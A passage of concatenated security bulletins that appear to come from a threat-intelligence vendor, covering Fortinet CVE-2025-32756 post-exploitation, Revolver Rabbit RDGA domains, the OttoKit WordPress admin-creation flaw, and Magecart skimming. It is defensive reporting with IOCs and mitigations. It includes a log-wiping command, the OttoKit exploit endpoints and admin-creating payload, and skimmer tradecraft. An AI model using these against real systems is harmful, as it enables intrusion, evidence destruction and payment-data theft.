****/bin/fmtest ****(MD5: 2c8834a52faee8d87cff7cd09c4fb946) to scan internal networks for additional exploitable devices.Setup SOCKS5 tunneling via the modified httpd.conf to facilitate pivoting through the compromised device.Phase 6: Anti-Forensics and Log ErasureAttackers periodically erase or rotate log files to hide tracks:Crash log contents redirected to .syncFiles like fcgi.debug are wiped with:cat /dev/null > /var/spool/crashlog/fcgi.debugInjected logs such as:mod_fcgid: error reading data, FastCGI server closed connectionmod_fcgid: process exit(communication error), get unexpected signal 11May serve as a technical IoC showing fcgid instability after tamperingPhase 7: Command and Control (C2) and Data ExfiltrationTA uses established reverse shells or SOCKS proxies for C2 communication.Credentials stored in the following file get exfiltrated regularly:/var/spool/.sync/tmp/.sshdpmare ****Timeline2025-05-07 - Initial Fortinet telemetry identifies anomalous exploitation attempts.2025-05-13 - Official Fortinet PSIRT advisory (FG-IR-25-254) released.2025-05-14 - Added reference to the CISA KEV listing.IOCsThe following IOCs were stated in Fortinet’s PSIRT advisory (FG-IR-25-254).IP Addresses:198.105.127[.]12443.228.217[.]17343.228.217[.]82156.236.76[.]90218.187.69[.]244218.187.69[.]59Files & HashesFileDescriptionMD5/bin/wpad_ac_helperMain malware component4410352e110f82eabc0bf160bec41d21/lib/libfmlogin.soSSH login sniffer364929c45703a84347064e2d5de45bcd/bin/fmtestNetwork scanner2c8834a52faee8d87cff7cd09c4fb946/bin/busyboxMulti-purpose binary (2 variants)ebce43017d2cb316ea45e08374de7315 / 489821c38f429a21e1ea821f8460e590Network Behaviors:Unexpected requests to /remote/hostcheck_validateEnabling of fcgi debugging (used to capture login attempts)Removal of system crash logs post-exploitationPersistence Indicators:Rewritten binaries with embedded credential harvestersMalicious cron jobs running under rootSSH credential siphoning via modified shared libraries CVE-2025-32756 is a critical remote code execution vulnerability in multiple Fortinet products that has been actively exploited in the wild. With a CVSS score of 9.8 and evidence of sophisticated post-exploitation activity, including credential harvesting, system modification, and persistence mechanisms, this vulnerability poses a severe risk to enterprise environments. Organizations are strongly urged to apply vendor patches immediately, audit systems for known indicators of compromise (IOCs), and proactively shield against identified malicious IPs. Comprehensive monitoring, log review, and hardening of exposed services are essential to detect and prevent further exploitation (Cyber Security News, 2025).Centripetal’s PerspectiveCentripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2025-32756, which has been exploited in the wild to gain unauthenticated remote code execution on Fortinet appliances through a stack-based buffer overflow in the /remote/hostcheck_validate endpoint. At the time of the POC’s release, Centripetal had 100% coverage against the network indicators disclosed.Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats.If you are a current client of Fortinet please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesFortinet - Stack-based buffer overflow vulnerability in APICyber Security News - PoC Exploit Released for Fortinet 0-Day Vulnerability that Allows Remote Code ExecutionNIST - CVE-2025-32756   --- ### [Revolver Rabbit and the Rise of RDGAs](https://www.centripetal.ai/threat-research/revolver-rabbit-and-the-rise-of-rdgas) Published: 2025-06-05 Summary: Revolver Rabbit has registered over 500,000 algorithmically generated .bond domains using RDGAs—a tactic that evades traditional detection. This Security Bulletin covers the scale, patterns, and… By Anna Balabushko Revolver Rabbit is one of the most prolific actors leveraging Registered Domain Generation Algorithms (RDGAs), a rising domain abuse tactic that evades traditional DGA detection by pre-registering algorithmically generated domains. Since 2022, the actor has registered over 500,000 domains on the .bond Top-Level-Domain (TLD), spending more than $1 million in domain registration fees, which reflects both scale and significant financial investment (Infoblox, 2024). Their domains typically follow repeatable patterns, such as dictionary words plus numeric suffixes (e.g., private-jets-99557[.]bond) or geographic/time-based elements (e.g., ai-courses-2024-pk[.]bond). Additional variants use short alphanumeric suffixes or double dashes, complicating rule-based detection (Infoblox Blog, 2024). These syntactic variations often evade traditional string-matching techniques, requiring DNS-layer telemetry and clustering for full visibility (Infoblox Research Report, 2024). From October 2023 to April 2024, over 2 million unique RDGA domains were detected, with Revolver Rabbit among the few groups linked to XLoader malware samples, where its domains served as both decoy infrastructure and active C2 endpoints. While later identified as an advertising network, its domains may have been repurposed by threat actors post-campaign, complicating attribution (BleepingComputer, 2024). Our Intelligence Insight In the past month, the CleanINTERNET® service identified outbound web traffic involving domains consistent with RDGA tradecraft attributed to Revolver Rabbit, specifically, logged to multiple .bond domains, each exhibiting syntax and structural patterns characteristic of the actor’s naming convention, such as dictionary word combinations with numeric or country-code suffixes (Figure 1.) Figure 1. Examples of RDGA domains associated with Revolver Rabbit observed by CleanINTERNET These domains have been linked to suspicious infrastructure in malware campaigns, functioning as C2 nodes or decoys while presenting as benign parked pages, a tactic used to avoid detection (Infoblox, 2024). Sandbox analysis from UrlQuery of a .bond domain being sinkholed by Quad9 DNS confirms that such domains often host link farms, with malicious functionality activated only under specific conditions (Figure 2). Figure 2. UrlQuery sandbox analysis of a domain seen by CleanINTERNET® This reflects the core strategy behind Revolver Rabbit’s RDGA operations is mass domain registration with minimal individual signals, enabling them to slip past traditional blocklists. The observed clustering highlights the critical need for DNS-layer visibility and behavioral analytics, since superficial analysis often misses the infrastructure’s malicious function. DGAs vs RDGAs? Registered Domain Generation Algorithms (RDGAs) represent a tactical shift from traditional Domain Generation Algorithms (DGAs) used in malware campaigns. While both produce large numbers of domain names algorithmically, their mechanisms and applications differ significantly: Traditional DGAs- pseudo-random generators used by malware to create domain names, that may use random strings or dictionary words, with dictionaries either hardcoded or sourced externally. Most generated domains remain unregistered, aiding evasion but enabling detection through pattern analysis. Registered DGAs, by contrast, keep the algorithm secret and pre-register all generated domains in advance. These domains are operational immediately and often resemble legitimate services, making them harder to detect through traditional static analysis. Unlike DGAs, which are primarily used for malware C2, RDGAs support a broader range of activities, including phishing, spam, fraud, and scam distribution. They are also used by both malicious actors and legitimate businesses, with tools like Namecheap’s “Beast Mode” enabling large-scale domain registration by anyone (Infoblox, 2024). This distinction is critical for defenders: RDGA infrastructure cannot be dismantled through DGA-based blocking alone and requires advanced DNS telemetry and behavioral analytics to detect. The following table summarizes key differences between traditional DGAs and RDGAs: Aspect Traditional DGA RDGA Generation Location Within the malware External, controlled by the attacker Domain Registration Few domains registered by attacker All generated domains registered by attacker NXDOMAIN Responses High (many unregistered domains) Low (all domains registered) Detection Difficulty Easier due to NXDOMAIN patterns Harder due to fully registered domains Use Cases Primarily for malware C2 communication Malware, phishing, spam, scams, TDSs, VPNs, etc. Campaign Purpose Revolver Rabbit is threat actor that operates at scale, leveraging domain infrastructure for what appears to be a dual-use model, serving both legitimate advertising and, potentially, malicious operations. Although initially suspected of direct threat activity due to RDGA domain overlap with malware campaigns, subsequent research identified the group as an advertising affiliate network. However, telemetry shows that their infrastructure has been repeatedly co-opted by malware operators post-campaign (Infoblox, 2024). Infoblox’s analysis of over 40 XLoader samples from 2023–2024 revealed domains registered under Revolver Rabbit’s naming conventions (e.g., --.bond) being used as command-and-control (C2) nodes. In many cases, these domains appeared in DNS telemetry as outbound beacons or redirectors. Initially serving as benign advertising “parked” pages during active campaigns, many were later observed delivering payloads or facilitating malicious callbacks once abandoned. Infoblox notes that domains are often dropped or rotated out of use within weeks of an ad campaign's conclusion, creating a window of opportunity for threat actors to register expired RDGA domains or hijack infrastructure that remains dormant but routable. This temporal ambiguity makes attribution difficult: while domains may have been benign at the time of registration, they are demonstrably reused for malware operations shortly after. The Revolver Rabbit case demonstrates the operational gray zone between advertising networks and cybercrime infrastructure. It also reinforces the value of timing, telemetry, and DNS-layer behavioral analysis in distinguishing between RDGA domains actively supporting malicious activity versus those that are passively abused or impersonated. Delivery & Attack Chain Rather than following a fixed linear kill chain, Revolver Rabbit’s infrastructure supports a modular attack flow: Initial Access is achieved through phishing lures, trojanized downloads, or malvertising chains. These vectors frequently embed or redirect to Revolver Rabbit–registered domains that appear benign or thematically relevant (e.g., online-jobs-42681[.]bond, ai-courses-2024-pk[.]bond), increasing the likelihood of bypassing URL filtering. Payload Delivery or Callback occurs via these RDGA domains, which may serve multiple roles: Malware distribution nodes, as seen in XLoader samples (info-stealing malware, the successor of Formbook) referencing .bond RDGA domains. Command-and-Control (C2) endpoints, which may resolve to attacker infrastructure only under specific conditions or remain dormant until activated. Decoy infrastructure, used to mislead sandbox analysis by presenting parked domains or generic landing pages. The domains commonly follow recognizable linguistic patterns: concatenated dictionary words with numeric suffixes (e.g., security-surveillance-cameras-42345[.]bond), country codes (ai-courses-2024-in[.]bond), or even syntactic anomalies such as double dashes (welding-machines--56717[.]bond). These variants often resemble legitimate services, leveraging trust in seemingly innocuous topics like education, health, or travel. This polymorphic naming strategy enhances evasiveness by blending into the open web, frustrating static detection logic and enabling flexible domain rotation. DNS telemetry indicates that many of these domains initially behave like legitimate parked sites or advertising redirects, only later weaponized or repurposed post-campaign. Infoblox researchers note that many were “no longer actively used in the advertising network at the time of analysis,” though they appeared in malware samples functioning as C2 nodes or redirectors (Infoblox, 2024). Operation Model Revolver Rabbit’s infrastructure reveals an industrialized domain registration pipeline, where vast swaths of internet real estate are claimed algorithmically in advance. This registered-DGA (RDGA) strategy enables long-term planning of campaigns while avoiding the predictability of real-time domain generation algorithms, often flagged by endpoint or DNS security tools. The actor’s use of patterned domain sets (e.g., dictionary-word + number, country-code + year, or semantic phrases) suggests a blend of automation and linguistic engineering, possibly to preserve plausibility or to mimic legitimate domain portfolios. According to Infoblox, many domains followed “obvious human-readable formats that wouldn’t be caught by simple string matching,” demanding context-aware clustering and DNS enrichment to map the full infrastructure (Infoblox Blog, 2024). The operation is supported by: Heavy upfront investment, with hundreds of thousands of .bond domains acquired (costing more than $1 million in registration fees) before any public abuse is observed. Ephemeral domain usage, where domains may be used briefly for a campaign and then dropped, or may serve dual purposes (advertising and malicious callbacks). Ambiguity by design, blurring the line between legitimate and malicious use cases. Even after publication, Revolver Rabbit’s relationship to malware campaigns remains unclear due to the fluid reuse of domains by third parties (BleepingComputer, 2024). This model reflects a paradigm shift in attacker infrastructure strategy, where threat actors no longer rely solely on domain generation malware but instead build large, persistent, and repurposable registries. The result is a cost-effective, resilient platform that serves the needs of both financially motivated cybercriminals and legitimate-looking front operations, posing a sustained challenge to defenders relying on static threat intelligence or URL reputation alone. Centripetal’s Perspective CleanINTERNET® has maintained persistent monitoring for RDGA-based infrastructure, with continuous detections and protections in place across all customer environments. In this analysis, we focused specifically on the 42 domain-based Indicators of Compromise (IOCs) published in Infoblox’s July 17, 2024 research on the RGDA threat actors including “Revolver Rabbit”. This curated set of IOCs formed the foundation of a targeted retrospective analysis spanning July 17, 2024 through May 13, 2025, aiming to assess coverage, behavior, and attribution fidelity across our internal telemetry. While CleanINTERNET® sources threat intelligence from a wide range of partners and feeds, this analysis is limited to the domains explicitly identified by Infoblox. It does not represent the full extent of RDGA visibility within our ecosystem. In fact, throughout the extended reporting window from October 1, 2023, to May 17, 2025, CleanINTERNET® ingested over 2.17 million unique domain-based indicators tied to RDGA “Revolver Rabbit” infrastructure by pattern matching. Many of these extend well beyond the scope of the Infoblox report. Figure 3 visualizes this expansion, plotting a cumulative chart of RDGA-related domains over time. The trajectory is distinctly sigmoidal: initial activity was sparse, as infrastructure was seeded through late 2023 and early 2024, followed by a steep acceleration in Q2 and Q3 of 2024 as the adversary industrialized its registration cadence. Growth gradually tapers in Q1 2025, leveling off above 2.17 million unique domains by mid-May. The result underscores both the industrial scale of the operation and the visibility achievable through combined internal and partner telemetry. On the other hand, the current analysis focuses on how well the specific indicators surfaced by Infoblox align with our visibility and partner telemetry. Centripetal plans to perform additional analysis which focuses on this larger set of identified campaign related domains which fall outside the scope of this initial report. Figure 3.Cumulative Domain-Based IOCs Attributed to Revolver Rabbit RDGA Infrastructure Observed by CleanINTERNET® (Oct 2023 – May 2025) Initial results show that 88% of the Infoblox-attributed IOCs were observed within our threat intelligence environment (Figure 4). The small delta is consistent with Infoblox’s own stance that not all domains were active during the period of study. Dormant, parked, or unreleased domains likely account for the remaining 12%, which were not surfaced by our internal or partner feeds. Figure 4. Overall BDN coverage A temporal breakdown (Figure 5) highlights minimal visibility prior to October 2024, with fewer than 10 IOCs detected. Activity accelerated in Q4 2024, with monthly domain sightings exceeding 40. This trend supports Infoblox’s note that RDGA-generated domains may be activated in waves or reused in later stages of an operation, depending on campaign evolution. Figure 5. Monthly Entry of Infoblox-Attributed IOCs into CleanINTERNET® Threat Intelligence Behavioral classification (Figure 6) reveals that the majority of matched IOCs were flagged as command-and-control (C2) infrastructure, consistent with Infoblox’s assessment of Revolver Rabbit domains being used for beaconing and payload staging. Other domains were remained behaviorally uncategorized due to inactivity or evasion tactics. Figure 6. Percentage of BDN IoCs Associated with a Tactic Ultimately, this retrospective validates that CleanINTERNET® retains substantial coverage of known RDGA threats, including those highlighted in public threat research. However, it also underscores the importance of broader visibility: the Infoblox list represents a focused snapshot, while CleanINTERNET®’s telemetry reflects the industrial scale of RDGA usage across the global threat landscape. The Revolver Rabbit campaign exemplifies the growing sophistication and scale of RDGA-based threat infrastructure. By pre-registering algorithmically generated domains, often in human-readable formats, the actor blurs the line between benign advertising networks and malicious operations. While initial attributions linked these domains to potentially legitimate services, subsequent telemetry, malware correlations, and domain reactivation patterns suggest their repeated repurposing by cybercriminals. CleanINTERNET®’s targeted analysis of Infoblox’s July 17, 2024 RDGA IOCs confirms high visibility across our internal and partner telemetry, with 88% of observed domains aligning with malicious or suspicious behavior, predominantly command-and-control activity. However, this snapshot represents only a fraction of the broader RDGA ecosystem observed in the wild, which includes millions of domains created and leveraged by Revolver Rabbit and other threat actors for malicious activity. This campaign highlights the critical need for defenders to evolve beyond static detection and embrace DNS-layer telemetry, behavioral analytics, and clustering techniques to track RDGA infrastructure. As threat actors continue to industrialize domain registration and weaponize dormant infrastructure, comprehensive visibility and adaptive threat modeling will be key to sustained protection. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Infoblox - RDGAs: The Next Chapter in Domain Generation Algorithms MySecurityMarketplace - Registered DGAs : The Prolific New Menace No One Is Talking About Infoblox - Revolver Rabbit’s Million-Dollar Masquerade: Infoblox Uncovers The Hidden World of RDGAs Infoblox Threat Intel - Revolver Rabbit BleepingComputer - Revolver Rabbit gang registers 500,000 domains for malware campaigns TechRadar - Criminals are spending millions on malicious domains — and it's paying off for them in a big way Infoblox Research Report - Registered DGAs : The Prolific New Menace No One Is Talking About --- ### [OttoKit WordPress Plugin Vulnerability, CVE-2025-27007](https://www.centripetal.ai/threat-research/security-bulletin-ottokit-wordpress-plugin-vulnerability-cve-2025-27007) Published: 2025-05-20 Summary: CVE-2025-27007 is a critical OttoKit plugin flaw exploited within 91 minutes of disclosure, allowing attackers to create admin accounts on 100K+ WordPress sites. Update to v1.0.83 immediately and… CVE-2025-27007 is a critical unauthenticated privilege escalation vulnerability affecting the OttoKit WordPress plugin (formerly SureTriggers), which is used by over 100,000 websites for workflow automation and third-party integration. The vulnerability exists in the plugin’s create_wp_connection() function, which fails to properly verify user authentication when application passwords are not configured. This allows unauthenticated remote attackers to create administrator accounts on vulnerable websites (Patchstack, 2025a; The Hacker News, 2025).The vulnerability, initially disclosed on April 11, 2025, was patched on April 21, 2025, with version 1.0.83 of the plugin. Exploitation was observed just 91 minutes after public disclosure, highlighting the rapid response time of malicious actors (Patchstack, 2025a).Vulnerability Type (CWE)CWE-266: Incorrect Privilege Assignment. This refers to scenarios in which a software product assigns higher-than-appropriate privileges to a user or process, as seen in OttoKit’s failure to verify credentials via wp_authenticate_application_password() (NVD, 2025). CVSS ScoreBase Score : 9.8 (Critical)Attack Vector: NetworkAttack Complexity: LowPrivileges Required: NoneUser Interaction: NoneScope: UnchangedImpact on CIA:Confidentiality: HighIntegrity: HighAvailability: High Impacted VersionsAll versions of OttoKit (formerly SureTriggers) up to and including 1.0.82 are affected (Patchstack, 2025a). Mitigation StepsUpdate Plugin: Upgrade to OttoKit version 1.0.83 or later, which addresses the vulnerability by adding access key validation and fixing logic flaws in the REST API authentication (Patchstack, 2025b)Audit User Accounts: Review all administrator-level accounts for suspicious usernames like otto-connect, wp-bot-user, or admin_support (Infoziant, 2025).Monitor Logs: Check for POST requests to /wp-json/sure-triggers/v1/connection/create-wp-connection and /automation/action, particularly with suspicious payloads (Patchstack, 2025a).Restrict Access: If possible, restrict access to these REST API endpoints from untrusted IP addresses. Exploit ProcessInitial Exploit: Attackers send a POST request to /wp-json/sure-triggers/v1/connection/create-wp-connection, passing guessed or arbitrary usernames, passwords, and fake access keys. The request bypasses authentication if no application password has ever been configured (The Hacker News, 2025).Privilege Escalation: A follow-up POST request to /wp-json/sure triggers/v1/automation/action includes the payload: "type_event": "create_user_if_not_exists", silently creating a new administrator account on the targeted site (GitHub, 2025). TimelineApril 11, 2025: Vulnerability reported to Patchstack by researcher Denver Jackson.April 12, 2025: Vendor notified and began developing a patch.April 21, 2025: Patch released in OttoKit version 1.0.83.April 24, 2025: Forced updates deployed to most plugin users.May 2, 2025: Public disclosure of the vulnerability.May 2, 2025: Exploitation observed approximately 91 minutes after disclosure (Patchstack, 2025a). TTPs & IOCsTactics, Techniques, and ProceduresPrivilege Escalation: The vulnerability stems from improper validation in create_wp_connection() and misuse of the wp_authenticate_application_password() function (Patchstack, 2025b).Authentication Bypass: Exploits are successful only if application passwords have never been configured and if OttoKit has never been connected with an application password(The Hacker News, 2025).Post-Exploitation Persistence: Admin accounts are created silently and can be used to install malware, exfiltrate data, or maintain long-term access (Infoziant, 2025). Indicators of Compromise (IOCs):Suspicious REST API Calls:/wp-json/sure-triggers/v1/connection/create-wp-connection/wp-json/sure-triggers/v1/automation/action (Patchstack, 2025b) Malicious Payloads:Requests containing "type_event": "create_user_if_not_exists” (GitHub, 2025) Unauthorized Administrator Accounts:Usernames such as otto-connect, wp-bot-user, admin_support (Infoziant, 2025) Known Malicious IP Addresses:2a0b:4141[:]820:1f4::241.216.188[.]205144.91.119[.]115194.87.29[.]57196.251.69[.]118107.189.29[.]12205.185.123[.]102198.98.51[.]24198.98.52[.]226199.195.248[.]147 (The Hacker News, 2025) Centripetal’s PerspectiveCentripetal’s threat intelligence telemetry confirms early and comprehensive detection of OttoKit CVE-2025-27007 exploit activity, achieving 100% coverage of all known malicious IP addresses linked to the campaign. Nine unique IPs identified as indicators of compromise (IOCs) were observed in our Active Intelligence data, with first-seen dates spanning April 1 to May 6, 2025. Notably, eight of the nine IOCs were associated with reconnaissance activity, consistent with pre-exploitation scanning behavior used to identify unpatched WordPress instances running misconfigured OttoKit plugins. This reconnaissance heavy tactic supports a mass exploitation strategy driven by automation. Centripetal’s telemetry observed activity from six of the nine identified IP-based indicators of compromise (IOCs), with particularly aggressive behavior from IP address 41.216.188[.]205. This address accounted for over 87% of the top-triggering events across our customer base and was linked to repeated reconnaissance and scanning activity against WordPress sites. Public abuse databases confirm that this IP has been reported over 100 times by dozens of independent sources for web application attacks and brute-force behavior, with incidents logged as recently as May 19, 2025. Its consistent targeting of /wp-content/uploads/ and repeated 404 error generation aligns with adversarial probing techniques designed to locate unpatched OttoKit plugin deployments.The observed IOCs primarily reflect mass-scanning infrastructure likely tied to automated exploitation campaigns. Most exhibited early-stage reconnaissance behavior, such as admin panel enumeration and account creation attempts. This reinforces the adversary’s objective of broad targeting over tailored attacks, increasing the operational value of early IOC detection and containment.From a sector perspective, the education industry comprised 96.9% of affected telemetry, underscoring adversaries’ focus on academic institutions, which often operate complex WordPress infrastructures. Centripetal customers using Active Threat Defense were proactively protected, with policy enforcement and behavioral detection mechanisms neutralizing threats well before public disclosure on May 2, 2025.The exploitation of CVE-2025-27007 reinforces the persistent threat posed by unauthenticated API vulnerabilities in widely used plugins like OttoKit. With a CVSS score of 9.8 and no requirement for user interaction or prior access, this vulnerability exemplifies how minor configuration oversights can lead to full site compromise. The speed of exploitation, less than two hours post-disclosure, highlights the operational readiness of threat actors to weaponize public vulnerabilities at scale.Organizations relying on WordPress, particularly within the education sector, must remain alert. Immediate remediation through plugin updates, log auditing, and strict REST API controls are critical steps to reducing exposure. This incident also underscores the importance of layered defenses. Centripetal’s Active Threat Defense demonstrated how proactive, intelligence-driven security measures can detect, classify, and contain malicious activity before exploitation gains traction. As threat actors continue to automate their attack chains, defenders must match their speed and precision with equally agile and adaptive protections.If you are a current user of WordPress and use OttoKit plugin, please contact support@centripetal.ai.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resourceshttps://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploithttps://thehackernews.com/2025/05/ottokit-wordpress-plugin-with-100k.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2025-27007https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cvehttps://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patchedhttps://medium.com/@infoziant/ottokit-wordpress-plugin-vulnerability-cve-2025-27007-attackers-adding-admin-accounts-on-3356cd38c08f   --- ### [Magecart Campaign Evolution: From Third-Party Supply Chains to 404 Hijacking](https://www.centripetal.ai/threat-research/magecart-campaign-evolution-from-third-party-supply-chains-to-404-hijacking) Published: 2025-05-08 Summary: Magecart skims payment data by injecting malicious JavaScript into compromised sites. CleanINTERNET®️ recently detected activity linked to known Magecart infrastructure, highlighting ongoing risks to… Magecart is a long-running digital skimming threat attributed to multiple financially motivated cybercriminal groups specializing in the theft of payment card data from e-commerce websites. First identified in 2015, Magecart attacks have continuously evolved, leveraging compromised third-party services, supply chain vulnerabilities, and increasingly sophisticated obfuscation tactics to inject malicious JavaScript skimmers into checkout pages. Recent campaigns, observed through 2022 and 2023, show Magecart actors adopting new evasion methods such as abusing legitimate Content Delivery Networks (CDNs), hijacking 404 error pages for stealthier payload delivery, and disguising malicious scripts as trusted services like Google Tag Manager (Akamai, 2023).Magecart groups operate with a high degree of modularity and adaptability, often using multi-stage payloads where initial scripts dynamically load secondary skimmers only under specific conditions to evade sandboxing and threat detection. Advanced variants employ both Document Object Model(DOM) monitoring to track changes in real-time and event listener hooking to capture user input at the point of interaction, such as keystrokes or form submissions. Data is then exfiltrated through POST requests masked as legitimate analytics traffic. Notably, Magecart Group 8 has demonstrated an ability to maintain persistent access to compromised environments by layering redundant skimmers and rapidly shifting their C2 infrastructure when detected (Malwarebytes, 2021).Magecart's opportunistic and low-noise techniques make campaigns difficult to detect, especially when threat actors exploit trusted supply chains or manipulate highly trafficked 404 error pages (Dark Reading, 2023). These tactics allow attackers to skim data at scale without raising immediate suspicion. Stolen payment information is monetized on dark web marketplaces or leveraged for secondary fraud, contributing to Magecart’s persistence and profitability as a threat actor model. Given the extensive targeting of the educational, retail, hospitality, and financial sectors, Magecart remains a critical concern for any organization handling online transactions (Sansec, 2024).Centripetal’s ViewIn the past month, the CleanINTERNET service observed outbound web traffic events to domains like frontstatics[.]com 5.252.153[.]207[:]4430, a domain known to be associated with Magecart activity. The activity represents a case of initial access via a compromised website, where malicious JavaScript was detected running on the domain. This aligns with known Magecart tradecraft involving the injection of skimming code into legitimate web pages. At the time of analysis, Sucuri SiteCheck confirmed the presence of suspicious scripts on the site (Figure 1).Figure 1. Example of Magecart-injected JavaScript detected on frontstatics[.]com, as flagged by Sucuri SiteCheckMalware/Campaign Details & PurposeMagecart campaigns are primarily designed to exfiltrate sensitive customer information:Payment card numbers (PANs)Card Verification Values (CVV/CVC)Billing addressesEmail addressesPhone numbersSometimes full authentication credentials (if harvested during login)Magecart operations focus on compromising front-end web application code, often targeting the checkout workflows where financial and PII data are entered. E-skimming malware is injected into these pages either directly (through vulnerabilities or access to the CMS/server) or indirectly (via compromised third-party services integrated into the target's site).Notable Magecart Groups and their distinctions:Magecart Group 5: Focused on supply chain attacks, compromising widely used third-party libraries, widgets, or marketing services to infect thousands of downstream sites at once (Malwarebytes, 2019).Magecart Group 8: Particularly resilient and operationally complex, leveraging multi-layered skimmers, decoy scripts, fallback payload URLs, and rotating domains to ensure persistent infection even after partial cleanup (Malwarebytes, 2021).Technical Characteristics of Magecart Malware:Highly Obfuscated JavaScript:Techniques include variable name randomization, string splitting, runtime function generation, and nested encoding (Base64, hexadecimal).Use of Malicious or Impersonated Domains:Skimmer scripts are often hosted on domains that mimic trusted services (e.g., googletagmanager-info[.]com, google-anaiytics[.]com) to appear legitimate in browser DevTools and CDN calls (Akamai, 2023).Loader and Dropper Architecture:Many campaigns deploy a small initial loader, often posing as a benign analytics script, that subsequently downloads a second-stage skimmer payload dynamically, typically only when the user reaches a checkout or payment page.Some loaders incorporate environmental awareness, checking for signs of virtual machines, debugging, or security research environments before activating (Akamai, 2023).404 Error Page Hijacking:Campaigns such as those identified by Akamai and Dark Reading show attackers configuring web servers so that legitimate 404 responses serve malicious JavaScript, effectively weaponizing every mistyped URL or broken link to propagate the skimmer (Akamai, 2023).Data Exfiltration:Harvested data is copied and is either immediately sent to a collection server controlled by the attacker; or hidden on the server and collected later, to minimize detection risk.Data is usually sent using:Standard HTTP POST requests with obfuscated payloads.Stealthy GET requests disguised as image or analytics beacon traffic (e.g., loading a 1x1 pixel image with stolen data embedded in the URL) (Sansec, 2024).Purpose:Primary Objective:Steal sensitive customer data, particularly credit card information, for direct monetization on dark web markets or use in card-not-present fraud schemes.Secondary Objectives:Establish persistent access for long-term exploitation.Expand infrastructure (using compromised sites to host or spread further malicious content).Harvest broader datasets (such as login credentials, user behaviors, and marketing analytics) for extended profiling and secondary attacks.Delivery & Attack ChainMagecart campaigns operate through a sophisticated, multi-stage attack chain engineered for stealth, persistence, and scale. Each phase, from initial compromise to data exfiltration, demonstrates an increasing level of technical evasion and resilience against detection.1. Initial AccessMagecart attackers employ several vectors to gain unauthorized access to their target environments:Direct Site Compromise:Attackers exploit known vulnerabilities in e-commerce platforms (e.g., Magento, WooCommerce, OpenCart, PrestaShop), outdated CMS versions, and unpatched server software (Sansec, 2024).A notable example is the exploitation of CosmicSting (CVE-2024-34102), a critical XXE vulnerability in Adobe Commerce and Magento with a CVSS score of 9.8. This flaw allows unauthenticated attackers to upload malicious XML files that exploit unsafe deserialization paths. When triggered, it enables remote code execution under certain conditions, bypassing standard validation layers. Threat actors can use this for initial foothold, often deploying web shells or directly embedding skimmer code within checkout templates (Splunk, 2024).Supply Chain Infiltration:Magecart frequently targets third-party vendors whose scripts are embedded across many websites. A compromise here gives attackers broad access across multiple domains without breaching each individually (Sansec, 2024).Credential Theft:Magecart actors often leverage phishing attacks or exploit misconfigured cloud storage (e.g., AWS S3 buckets) to steal administrative credentials (TheHackerNews, 2020).Server Misconfiguration Abuse:Attackers increasingly manipulate server settings inject malicious content into error pages (e.g., 404 responses), thus gaining infection vectors that are outside of traditional CMS template files (Akamai, 2023).2. Payload Deployment and InfectionOnce inside, Magecart operators stealthily deploy skimming payloads designed to persist and evade both users and defenders:JavaScript Injection:Skimmers are injected directly into front-end resources, especially targeting checkout forms, login pages, or payment gateways (Sansec, 2024).Dynamic Loader Scripts:Instead of immediately injecting the full skimmer, small loader scripts are planted first. These loaders:Dynamically fetch second-stage payloads.Evade static code analysis.Frequently impersonate trusted services like Google Tag Manager or Google Analytics (Akamai, 2023).Targeted Activation:The injected skimmers often perform runtime checks:Verifying the page is a checkout page.Ensuring the user is not an automated bot.Detecting developer tools open in the browser (Sansec, 2024).Figure 2. Example of skimmer-injected fake checkout form created to harvest credit card data (Akamai, 2023)3. Execution (Skimming and Data Harvesting)The Magecart payload’s primary function is to harvest sensitive customer information from infected sites:Real-Time Skimming and Monitoring:JavaScript listeners hook into sensitive form fields to capture personal data.Captured data is processed and exfiltrated immediately, often before form submission, allowing attackers to steal information even if users abandon the checkout process.Stealth Mode Operations:Some variants delay activation until detecting valid input or specific user actions (e.g., clicking a "Purchase" button).This minimizes suspicious behavior and helps evade behavioral detection systems.Data Duplication via Interceptor and Collector ProgramsCustomer and payment data are duplicated using an interceptor/collector mechanism:Immediate Exfiltration: Private data is sent in real time to attacker-controlled collection servers.Delayed Collection: Data is secretly stored on the compromised server itself and retrieved later to minimize detection risk (Sansec, 2024).4. ExfiltrationCaptured data is covertly transmitted to attacker-controlled infrastructure:Encoded Data Transmission:Stolen information is typically obfuscated (Base64, URL encoding, JSON stringification) before being sent outCommand-and-Control (C2) via POST/GET:POST requests mimicking legitimate site actions.GET requests hidden in requests for tracking pixels (.gif images with query strings).Communication over HTTPS to blend into normal traffic.Fallback Infrastructure:Skimmers include backup C2 domain lists. If one domain is blocked or taken down, the malware auto-rotates to the next available server (Akamai, 2023).5. PersistenceMagecart groups invest heavily in maintaining infection longevity:Server-Side Persistence:Even if front-end code is cleaned, compromised 404 templates and server-side configurations reinfect web pages.Obfuscation and Redundancy:Multiple skimmer variants and loader scripts are embedded in different parts of the site (e.g., main HTML, JavaScript bundles, or error handling routines).Skimmers may also feature self-healing mechanisms, automatically reinserting malicious scripts if removed.Monitoring and Reinjection:Some Magecart operations actively monitor infected sites for signs of cleaning and re-deploy payloads within minutes (Akamai, 2023).VariationsMagecart activity revealed three distinct variations of a campaign designed to stealthily exfiltrate sensitive information. Each version demonstrates an evolution in techniques to evade detection and maintain persistence (Akamai, 2023).1. Malformed Image Tag LoaderSkimmer injects an <img> tag with an empty src and an onerror attribute containing obfuscated JavaScript.Figure 